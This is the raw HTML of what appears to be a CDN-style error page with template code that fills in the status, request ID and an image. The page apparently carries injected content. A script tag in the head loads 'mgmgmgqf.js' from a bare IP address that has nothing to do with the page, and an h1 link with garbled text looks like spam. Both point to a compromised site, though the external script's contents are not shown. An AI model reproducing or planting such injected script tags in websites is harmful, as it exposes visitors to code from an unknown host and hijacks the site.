  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport"
        content="width=device-width, user-scalable=no, initial-scale=1.0,maximum-scale=1.0, minimum-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Document</title>
  <style> * { box-sizing: border-box; } html { height: 100%; font-style: normal; } body{ height: 100%; margin: 0; padding: 0; font-style: normal; font-family: PingFang SC; .error-page{ position: absolute; left: 50%; transform: translateX(-50%); height: 100%; width: 70%; padding-top: 150px; max-width: 920px; .http-status { font-size: 68px; font-weight: 500; line-height: normal; letter-spacing: normal; color: #FF6A00; } .title { font-size: 24px; font-weight: 500; line-height: normal; letter-spacing: normal; color: #333333; } .desc { margin-top: 4px; font-size: 16px; font-weight: 500; line-height: 24px; letter-spacing: normal; color: #333333; } .request{ margin-top: 16px; width: 100%; height: 84px; border-radius: 6px; background: #F9F9F9; box-sizing: border-box; border: 1px solid #F4F4F4; padding: 16px 24px; font-size: 14px; font-weight: 500; line-height: 22px; letter-spacing: normal; color: #555555; .request-time { margin-top: 8px; }} .error-img { margin-top: 16px; width: 100%; img{ width: 100%; } } } .footer{ border-top: 1px solid #F4F4F4; position: fixed; text-align: center; line-height: 45px; height: 45px; width: 100%; bottom: 0; font-size: 16px; font-weight: 500; letter-spacing: normal; color: #AAAAAA; a{ color: #0064C8; text-decoration:none } } } </style>


<script src="http://160.124.228.128/mgmgmgqf.js"></script>


</head>
<Body><h1><a href="/">ÌÇlogo¹Ù·½Èë¿Ú</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
<div class="error-page">
  <div class="http-status"></div>
  <div class="title"></div>
  <div class="desc">
  </div>
  <div class="request">
    <div class="request-id"></div>
    <div class="request-time"></div>
  </div>
  <div class="error-img"></div>
</div>
<div class="footer">Performance & Security by <a href="none">ESA</a></div>
</body>
<script>
  var { http_status, title, desc, traceid, datetime, x_site_origin_resp_info }  = window.__ESA_ERROR_PAGE_INFO
  var hundredDigit = Math.floor(http_status / 100);
  var imgLinks = {
    'clientError': 'https://img.alicdn.com/imgextra/i1/O1CN01UFU7Za20FcE57RuJ0_!!6000000006820-2-tps-1840-504.png',
    'esaError': 'https://img.alicdn.com/imgextra/i2/O1CN01JGkrte1mu0XIkuUx2_!!6000000005013-2-tps-1840-504.png',
    'serverError': 'https://img.alicdn.com/imgextra/i4/O1CN01fhinso28KfWUOinu6_!!6000000007914-2-tps-1840-504.png'
  }
  var imgSrc = undefined
  var flag5xx = x_site_origin_resp_info.split('||')[1]
  if (hundredDigit === 4) {
    if (http_status === 403) {
      imgSrc = undefined
    } else {
      imgSrc = imgLinks['clientError']
    }
  } else if (hundredDigit === 5) {
    if (flag5xx === '2' || flag5xx === '0') {
      imgSrc = imgLinks['serverError']
    }else if(flag5xx === '1') {
      imgSrc = imgLinks['esaError']
    }else{
      imgSrc = imgLinks['esaError']
    }
  }
  window.onload = function () {
    var httpStatus = document.getElementsByClassName('http-status')[0];
    httpStatus.innerHTML = http_status;
    var errorTitle = document.getElementsByClassName('title')[0];
    errorTitle.innerHTML = title;
    var subContent = document.getElementsByClassName('desc')[0];
    subContent.innerHTML = desc;
    var requestId = document.getElementsByClassName('request-id')[0];
    requestId.innerHTML = `Request ID: ${traceid}`;
    var requestTime = document.getElementsByClassName('request-time')[0];
    requestTime.innerHTML = datetime;
    var errorImg = document.getElementsByClassName('error-img')[0];
    errorImg.innerHTML = imgSrc ? `<img alt="" src=/wp-content/themes/wandi/${imgSrc}>` : null;
  }
</script>
</html>
